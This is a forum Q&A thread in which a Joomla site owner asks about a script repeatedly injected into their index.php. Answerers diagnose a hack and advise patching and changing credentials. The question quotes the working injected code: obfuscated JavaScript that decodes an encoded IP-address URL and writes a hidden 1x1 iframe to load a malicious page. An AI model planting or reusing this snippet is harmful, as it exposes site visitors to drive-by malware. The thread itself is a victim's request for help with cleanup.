views:

41

answers:

2

I have seen that , this happend twice that , in my root index.php file. I have this thing added

<html><body><script type='text/javascript'>str="<vdepognbt src=" + unescape('%68%74%74%70%3a%2f%2f%37%39%2e%31%33%35%2e%31%35%32%2e%31%38%31%2f%73%74%61%74%73%2f%67%6f%2e%70%68%70%3f%73%69%64%3d%31') + " Oaoz5='1'vxoq5='1'>";str = str.replace('vde', 'i');str =str.replace('pog', 'fr');str = str.replace('nbt', 'ame');str =str.replace('Oaoz5', 'width');str =str.replace('vxoq5','height');document.write(str);</script></body></html>

Does anyone knows what is that and how it comes.

When i tried to open my webiste in google chrome , it told me that some malacious software is trying to run from harmful website , do you want to allow it.

How ever when deleted that script then everything was ok

But this ahppedn twice in 2 weeks

Is that the virus . how can something chANGE MY CODE

i AM USING JOOMLA

A: 

Your site has been hacked. You'll need to make sure your Joomla installation, all of its plugins, and all the other software on the server are patched to the latest versions. If it's a shared server, your host may be able to help. Otherwise, consult your server logs.

ceejayoz
i have the vps hosting , i have have not given access to outside clients. Which logs i should check
Mirage
A: 

You have been hacked. You should change your FTP and MYSQL passwords, upgrade to the latest version of Joomla (currently 1.5.18) and check all of your components and plugins for vulnerabilities in this list http://docs.joomla.org/Vulnerable_Extensions_List

Jeepstone